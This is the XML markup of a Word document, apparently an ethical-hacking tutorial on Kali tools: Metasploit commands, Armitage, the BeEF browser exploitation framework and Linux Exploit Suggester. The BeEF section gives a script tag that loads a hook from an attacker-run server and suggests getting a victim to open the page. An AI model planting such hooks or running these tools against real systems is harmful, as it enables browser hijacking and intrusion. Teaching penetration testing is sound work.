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40EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF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As we mentioned before, </w:t>
      </w:r>
      <w:proofErr w:type="spell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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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is a product of Rapid7 and most of the resources </w:t>
      </w:r>
      <w:proofErr w:type="gram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can be found</w:t>
      </w:r>
      <w:proofErr w:type="gram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on their web page </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A840EF">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
            <w:color w:val="008000"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.metasploit.com</w:t>
        </w:r>
      </w:hyperlink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. It is available in two versions - commercial and free edition. The differences between these two versions is not much hence, in this case we will be using the Community version (free).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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As an Ethical Hacker, you will be using “Kali </w:t>
      </w:r>
      <w:proofErr w:type="spell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Ditribution</w:t>
      </w:r>
      <w:proofErr w:type="spell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” which has the </w:t>
      </w:r>
      <w:proofErr w:type="spell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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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community version embedded, along with other ethical hacking </w:t>
      </w:r>
      <w:proofErr w:type="gram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tools which</w:t>
      </w:r>
      <w:proofErr w:type="gram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are very comfortable by saving time of installation. However, if you want to install as a separate tool it is an application that </w:t>
      </w:r>
      <w:proofErr w:type="gram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can be installed</w:t>
      </w:r>
      <w:proofErr w:type="gram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in the operating systems like Linux, Windows and OS X.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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First, open the </w:t>
      </w:r>
      <w:proofErr w:type="spell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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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Console in Kali. Then, go to Applications </w:t>
      </w:r>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>→</w:t>
      </w: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Exploitation Tools </w:t>
      </w:r>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>→</w:t>
      </w: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</w:t>
      </w:r>
      <w:proofErr w:type="spell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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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5000" cy="3990975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16" name="Picture 16" descr="Exploitation T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loitation Tool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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">After it starts, you will see the following screen, where the version of </w:t>
      </w:r>
      <w:proofErr w:type="spell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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
      <w:proofErr w:type="gram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is underlined</w:t>
      </w:r>
      <w:proofErr w:type="gram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in red.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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5000" cy="4124325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15" name="Picture 15" descr="Metasploit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etasploit Vers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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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In the console, if you use help </w:t>
      </w:r>
      <w:proofErr w:type="gram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or ?</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
      <w:proofErr w:type="gram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symbol</w:t>
      </w:r>
      <w:proofErr w:type="gram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, it will show you a list with the commands of MSP along with their description. You can choose based on </w:t>
      </w:r>
      <w:proofErr w:type="gram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your needs and what you will use</w:t>
      </w:r>
      <w:proofErr w:type="gram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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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15000" cy="4895850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture 14" descr="Console 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sole Symbo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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF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Another important administration command is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A840EF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msfupdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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 which</w:t>
      </w:r>
      <w:proofErr w:type="gram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helps to update the </w:t>
      </w:r>
      <w:proofErr w:type="spell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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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with the latest vulnerability exploits. After running this command in the console, you will have to wait several minutes until the update is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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15000" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="MSF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SFUpda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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF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It has a good command called “Search” which you can use to find what you want as shown in the following screenshot. For example, I want to find exploits related to Microsoft and the command can be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A840EF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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A840EF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 xml:space="preserve"> &gt;search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A840EF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name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A840EF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:Microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A840EF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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A840EF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type:exploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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Where “search” is the command, ”name” is the name of the object that we are looking for, and “type” is what kind of script we are looking for.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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5000" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12" name="Picture 12" descr="Search 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arch Comma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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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lastRenderedPageBreak/>
        <w:t>Another command is “info”. It provides the information regarding a module or platform where it is used, who is the author, vulnerability reference, and the payload restriction that this can have.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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5000" cy="3400425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11" name="Picture 11" descr="Info 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fo Comma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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Armitage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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Armitage GUI for </w:t>
      </w:r>
      <w:proofErr w:type="spell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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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is a complement tool for </w:t>
      </w:r>
      <w:proofErr w:type="spell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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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. It visualizes targets, recommends exploits, and exposes the advanced post-exploitation features.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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proofErr w:type="gram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Let’s</w:t>
      </w:r>
      <w:proofErr w:type="gram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open it, but firstly </w:t>
      </w:r>
      <w:proofErr w:type="spell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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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console should be opened and started. To open Armitage, go to Applications </w:t>
      </w:r>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>→</w:t>
      </w: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Exploit Tools </w:t>
      </w:r>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>→</w:t>
      </w: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Armitage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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15000" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="Armi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mit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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF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Click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A840EF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Connect</w:t>
      </w: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 button, as shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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5000" cy="3543300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="Conn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nec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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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When it opens, you will see the following screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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15000" cy="3324225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8" name="Picture 8" descr="User Friend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er Friendl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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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Armitage is user friendly. The area “Targets” lists all the machines that you have discovered and you are working with, the hacked targets are red in color with a thunderstorm on it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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After you have hacked the target, you can right-click on it and continue exploring with what you need to do such as exploring (browsing) the folders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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5000" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="Explo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xplor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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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In the following GUI, you will see the view for the folders, which </w:t>
      </w:r>
      <w:proofErr w:type="gram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is called</w:t>
      </w:r>
      <w:proofErr w:type="gram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console. Just by clicking the folders, you can navigate through the folders without the need of </w:t>
      </w:r>
      <w:proofErr w:type="spell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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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On the right side of the GUI, is a section where the modules of vulnerabilities </w:t>
      </w:r>
      <w:proofErr w:type="gram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are listed</w:t>
      </w:r>
      <w:proofErr w:type="gram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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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266950" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="Console F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nsole Fold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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF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proofErr w:type="spell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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spell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stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00A840EF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Browser Exploitation Framework</w:t>
      </w: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. It is a </w:t>
      </w:r>
      <w:proofErr w:type="gram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penetration testing</w:t>
      </w:r>
      <w:proofErr w:type="gram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tool that focuses on the web browser. </w:t>
      </w:r>
      <w:proofErr w:type="spell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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spell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allows the professional penetration tester to assess the actual security posture of a target environment using client-side attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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First, you have to update the Kali package using the following commands −</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">:/# apt-get update  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>:/# apt-get install beef-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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To start, use the following command −</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>:/# cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>/share/beef-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>:/# ./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 xml:space="preserve">beef </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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15000" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="Kali Pack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ali Pack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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF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Open the browser and enter the username and password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A840EF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beef</w:t>
      </w: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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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14675" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="Open Brow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pen Brows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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF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The </w:t>
      </w:r>
      <w:proofErr w:type="spell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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spell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hook is a JavaScript file hosted on the </w:t>
      </w:r>
      <w:proofErr w:type="spell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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spell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server that needs to run on client browsers. When it does, it calls back to the </w:t>
      </w:r>
      <w:proofErr w:type="spell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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spell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server communicating a lot of information about the target. It also allows additional commands and modules to be ran against the target. In this example, the location of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A840EF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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spell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 hook is at </w:t>
      </w:r>
      <w:r w:rsidRPr="00A840EF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http://192.168.1.101:3000/hook.js</w:t>
      </w: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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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In order to attack a browser, include the JavaScript hook in a page that the client will view. There are a number of ways to do that, however the easiest is to insert the following into a page and somehow get the client to open it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr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lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> = "http://192.168.1.101:3000/hook.js" type = "text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">"&gt;&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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Once the page loads, go back to the </w:t>
      </w:r>
      <w:proofErr w:type="spell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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spell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Control Panel and click “Online Browsers” on the top left. After a few seconds, you should see your IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins </w:t>
      </w:r>
      <w:proofErr w:type="gram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are installed</w:t>
      </w:r>
      <w:proofErr w:type="gram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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="Page 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age Loa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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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proofErr w:type="gram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To remotely run</w:t>
      </w:r>
      <w:proofErr w:type="gram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the command, click the “Owned” host. Then, on the command click the module that you want to execute, and finally click “Execute”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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15000" cy="5029200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="Run Remote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un Remotely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0EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--ff-lato)" w:eastAsia="Times New Roman" w:hAnsi="var(--ff-lato)" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF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It suggests possible exploits given the release version </w:t>
      </w:r>
      <w:r w:rsidRPr="00A840EF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‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A840EF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uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A840EF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 xml:space="preserve"> -r’</w:t>
      </w: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 of the Linux Operating System.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840E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To run it, type the following command −</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>-exploit-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t># ./Linux_Exploit_Suggester.pl -k 3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840EF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A840EF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3.0.0</w:t>
      </w:r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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A840EF">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> the kernel version of Linux OS that we want to exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A840EF" w:rsidRPr="00A840EF" w:rsidRDefault="00A840EF" w:rsidP="00A840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0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38800" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="Kernel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ernel Vers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ED6" w:rsidRDefault="00451ED6">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00451E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f-lato)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0EF"/>
    <w:rsid w:val="00451ED6"/>
    <w:rsid w:val="006D7F62"/>
    <w:rsid w:val="007D0DCC"/>
    <w:rsid w:val="00A840EF"/>
    <w:rsid w:val="00DF5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9DAAFC-86FC-413D-A99B-1BFE37E66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840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840E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A840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840E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40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40E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8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hyperlink" Target="https://www.metasploit.com./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754</Words>
  <Characters>4303</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>35</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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waseem</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Muhammad waseem</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-25T17:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-25T17:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>